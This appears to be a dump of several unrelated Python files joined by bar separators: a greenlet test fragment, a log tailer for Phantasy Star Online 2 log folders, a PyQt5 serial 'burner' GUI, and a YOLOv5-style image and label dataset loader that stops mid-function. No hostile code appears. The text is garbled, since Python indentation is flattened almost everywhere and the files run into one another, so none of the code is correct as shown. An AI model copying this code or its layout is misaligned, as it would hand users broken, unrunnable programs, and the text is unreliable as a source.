class NoContextVarsTests(unittest.TestCase):
def test_contextvars_errors(self):
let1 = greenlet(getcurrent().switch)
self.assertFalse(hasattr(let1, "gr_context"))
with self.assertRaises(AttributeError):
getattr(let1, "gr_context")
with self.assertRaises(AttributeError):
let1.gr_context = None
let1.switch()
with self.assertRaises(AttributeError):
getattr(let1, "gr_context")
with self.assertRaises(AttributeError):
let1.gr_context = None
|
logpump.py
|
import csv
import functools
import heapq
import logging
import re
import threading
import time
from datetime import datetime
from pathlib import Path
logger = logging.getLogger(__name__)
class Entry(list):
"""ログのエントリを表現するクラス"""
def __init__(self, row: list, category: str, ngs: bool):
super(Entry, self).__init__(row)
if len(self) == 3:
cols = self.pop().split("\t")
self.extend(cols)
self.timestamp = self.str2ts(self[0])
self.sequence = int(self[1])
self.category = category
self.ngs = ngs
def __eq__(self, other):
return self.sequence == other.sequence
def __lt__(self, other):
return self.sequence < other.sequence
def __str__(self):
s = f"{self.category}:" + ",".join(self).replace("\n", r"\n")
if self.ngs:
s = "ngs:" + s
return s
@staticmethod
@functools.lru_cache(maxsize=8)
def str2ts(s):
year = int(s[0:4])
month = int(s[5:7])
day = int(s[8:10])
hour = int(s[11:13])
minute = int(s[14:16])
second = int(s[17:19])
dt = datetime(year, month, day, hour, minute, second)
# dt = datetime.strptime(s, '%Y-%m-%dT%H:%M:%S')
return int(dt.timestamp())
    # Expose numeric fields such as Meseta(...) or Num(...) as attributes.
def __getattr__(self, name):
rx = re.compile(name + r'\((-?\d+)\)')
for s in filter(lambda x: name in x, self):
res = rx.search(s)
if res:
return int(res.group(1))
return None
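    # Example (editor note): for an entry containing the string "Meseta(5000)",
    # entry.Meseta returns 5000; names that do not appear in the entry return None.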
def MyDocuments():
import ctypes.wintypes
CSIDL_PERSONAL = 5 # My Documents
SHGFP_TYPE_CURRENT = 0 # Want current, not default value
buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)
ctypes.windll.shell32.SHGetFolderPathW(
0, CSIDL_PERSONAL, 0, SHGFP_TYPE_CURRENT, buf)
return Path(buf.value)
class LogFile:
"""
ログファイルから未読部分を読み取る
"""
def __init__(self, path: Path, newfile=False):
self.path = path
self.category = self.cate(self.path.stem)
# self.pos = 2 if newfile else self.path.stat().st_size # 2=BOM
        # Do not trust st_size; read the file forward to determine pos.
self.pos = 2 # 2=BOM
if not newfile:
self.tail()
logger.debug(f'LogFile({self.path.stem}, {newfile}) pos={self.pos}')
@staticmethod
def cate(stem):
return re.match(r'(.+)(Log|_log)', stem).group(1)
class IncompleteLineError(Exception):
def __init__(self):
super().__init__('IncompleteLineError')
def tail(self) -> list:
while True:
try:
return self._tail()
except (UnicodeError, self.IncompleteLineError) as e:
logger.debug(f'{self.path.stem}: {e}')
time.sleep(0.5)
except Exception as e:
logger.debug(f'{self.path.stem}: {e}')
return []
def _tail(self) -> list:
ls = []
with self.path.open(encoding='utf-16-le', newline='') as f:
f.seek(self.pos, 0)
while True:
line = f.readline()
if not line:
self.pos = f.tell()
return ls
if not line.endswith('\n'):
raise self.IncompleteLineError
ls.append(line)
while line.count('"') % 2 == 1:
trail = f.readline()
if not trail or not trail.endswith('\n'):
raise self.IncompleteLineError
ls.append(trail)
line += trail
def seqregurator(callback):
"""callbackのsequence順を保障するwrapper"""
def flush(heap, expect):
drop = []
while heap:
entry = heapq.heappop(heap)
callback(entry)
drop += list(range(expect, entry.sequence))
expect = entry.sequence + 1
if drop:
drop = ','.join(map(str, drop))
logger.warning(f'Drop {drop}')
return expect
def main():
heap = []
expect = None
while True:
entry = yield
if expect is None or entry.sequence < expect:
if expect is not None:
                    logger.info(f'sequence restart ({entry.sequence})')
flush(heap, expect)
expect = entry.sequence
heapq.heappush(heap, entry)
while heap and heap[0].sequence == expect:
entry = heapq.heappop(heap)
callback(entry)
expect += 1
if heap:
pend = ','.join(map(str, sorted([x.sequence for x in heap])))
logger.debug(f"expect:{expect} pend:{pend}")
ts = [x.timestamp for x in heap]
if (max(ts) - min(ts)) > 3:
expect = flush(heap, expect)
coro = main()
next(coro)
return coro.send
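# Editor-added illustrative sketch (hypothetical, never invoked): feeding out-of-order
# entries into seqregurator delivers them to the callback in sequence order.
def _demo_seqregurator():
    import dataclasses

    @dataclasses.dataclass(order=True)
    class FakeEntry:  # minimal stand-in for Entry (sequence + timestamp only)
        sequence: int
        timestamp: int = 0

    received = []
    emit = seqregurator(lambda e: received.append(e.sequence))
    for seq in (1, 3, 2, 4):  # 3 arrives early and is buffered until 2 shows up
        emit(FakeEntry(seq))
    return received  # -> [1, 2, 3, 4]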
class LogFolder:
def __init__(self, path: Path, callback):
logger.debug(f'LogFolder({str(path)})')
self.path = path
self.callback = seqregurator(callback)
self.logfiles = {
path: LogFile(path)
for path in self.logs()
}
self.ngs = "ngs" in path.stem
self.known = set(self.logfiles.keys())
def logs(self):
logs = list(filter(
lambda path: path.stem != "pso2dynamicdownloader_log",
self.path.glob("*Log*.txt")))
def newestof(cate):
logs_cate = filter(lambda x: x.stem.startswith(cate), logs)
return max(logs_cate)
categories = {LogFile.cate(x.stem) for x in logs}
return {newestof(cate) for cate in categories}
def scan(self):
now = self.logs()
for path in (now - self.known):
self.logfiles[path] = LogFile(path, True)
self.known.add(path)
for log in self.logfiles.values():
for row in csv.reader(log.tail(), dialect=csv.excel_tab):
entry = Entry(row, log.category, self.ngs)
self.callback(entry)
for path in (self.known - now):
del self.logfiles[path]
self.known.discard(path)
logger.debug('removed ' + str(path))
class LogPump:
def __init__(self, callback):
sega = MyDocuments().joinpath("SEGA")
self.folderz = {
path: LogFolder(path, callback)
for path in map(
lambda subpath: sega.joinpath(subpath), [
'PHANTASYSTARONLINE2/log',
'PHANTASYSTARONLINE2/log_ngs',
])
if path.is_dir()
}
self.th = threading.Thread(target=self._main, daemon=True)
def _main(self):
while self.keep_running:
for folder in self.folderz.values():
folder.scan()
time.sleep(0.5)
def start(self):
self.keep_running = True
self.th.start()
def stop(self):
self.keep_running = False
self.th.join()
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG,
format='%(levelname)s : %(asctime)s : %(message)s')
pump = LogPump(print)
pump.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
pump.stop()
|
MrBurner.py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQtEngine import Ui_MainWindow
from SerialManager import SerialManager
from ConsoleManager import ConsoleManager
from FileManager import FileManager
from BurnerManager import BurnerManager
from time import sleep as delay
from Utils import Utils
import threading
import sys
class MrBurner():
def __init__(self):
self.ports = []
self.MainWindow = None
self.ui = None
def startApp(self):
self.app = QtWidgets.QApplication(sys.argv)
self.MainWindow = QtWidgets.QMainWindow()
self.ui = Ui_MainWindow()
self.ui.setupUi(self.MainWindow)
app_icon = QtGui.QIcon()
app_icon.addFile('Logo.jpg', QtCore.QSize(256,256))
self.MainWindow.setWindowIcon(app_icon)
self.MainWindow.show()
self.translate = self.ui.translate
self.portSelector = self.ui.portSelector
self.baudSelector = self.ui.baudSelector
self.hexBox = self.ui.hexBox
self.console = self.ui.console_thread
#Buttons
self.connectButton = self.ui.connectButton
self.flashButton = self.ui.flashButton
self.eraseButton = self.ui.eraseButton
self.sendButton = self.ui.sendButton
        # Actions
self.openFile = self.ui.actionOpen
# Init Managers
delay(1)
self.consoleManager = ConsoleManager(self.console)
self.serialManager = SerialManager(self.consoleManager, self.ui, self.app)
self.fileManager = FileManager(self.hexBox, self.ui)
self.burnerManager = BurnerManager(self.serialManager, self.fileManager, self.ui.progressBar, self.consoleManager)
self.startSignals()
self.startThreads()
def startThread(self, function):
threading.Thread(target=function, daemon=True).start()
def startSignals(self):
self.consoleManager.pub('Starting Signals\n')
self.portSelector.currentIndexChanged.connect(self.serialManager.change_port)
self.connectButton.clicked.connect(self.serialManager.connect)
self.eraseButton.clicked.connect(self.serialManager.change_port)
self.flashButton.clicked.connect(self.burnerManager.burn)
self.sendButton.clicked.connect(self.serialManager.send_write)
self.openFile.triggered.connect(self.fileManager.open_file)
def startThreads(self):
self.startThread(self.serialManager.port_events)
# self.startThread(self.serialManager.port_selector_observer)
# self.startThread(self.serialManager.read_port)
# self.startThread(self.burnerManager.burn_task)
if __name__ == "__main__":
app = MrBurner()
app.startApp()
sys.exit(app.app.exec_())
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8]) # number of workers
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class LoadImages: # for inference
def __init__(self, path, img_size=640):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(path, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
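# Editor-added usage sketch (assumes a hypothetical 'data/images' folder; not part of the
# original file): iterating LoadImages yields the path, the letterboxed CHW RGB image,
# the original BGR image, and the video capture handle (None for still images).
#
#   for path, img, img0, vid_cap in LoadImages('data/images', img_size=640):
#       print(path, img.shape, img0.shape)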
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt') for x in
self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride
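# worked example (illustrative values, not used elsewhere): with img_size=640, stride=32 and pad=0.0,
# a batch of wide images whose largest h/w ratio is 0.75 gets shape [0.75, 1], so its letterboxed
# batch shape becomes 480x640 instead of a full 640x640 square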
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
l = self.labels[i] # label
if l.shape[0]:
assert l.shape[1] == 5, 'labels require 5 columns each: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
assert nf > 0, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = None
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
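# the four lines above map labels from normalized (x_center, y_center, w, h) in the original image
# to absolute (x1, y1, x2, y2) corner coordinates in the resized, padded (letterboxed) image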
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
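# the lookup tables map every possible 8-bit channel value to its gained value once, which is
# cheaper than scaling each pixel individually; hue wraps modulo 180 (OpenCV hue range),
# saturation and value are clipped to [0, 255]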
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
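# padw/padh translate this tile's label coordinates from its local frame into the 2s x 2s mosaic canvas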
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Replicate
# img4, labels4 = replicate(img4, labels4)
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
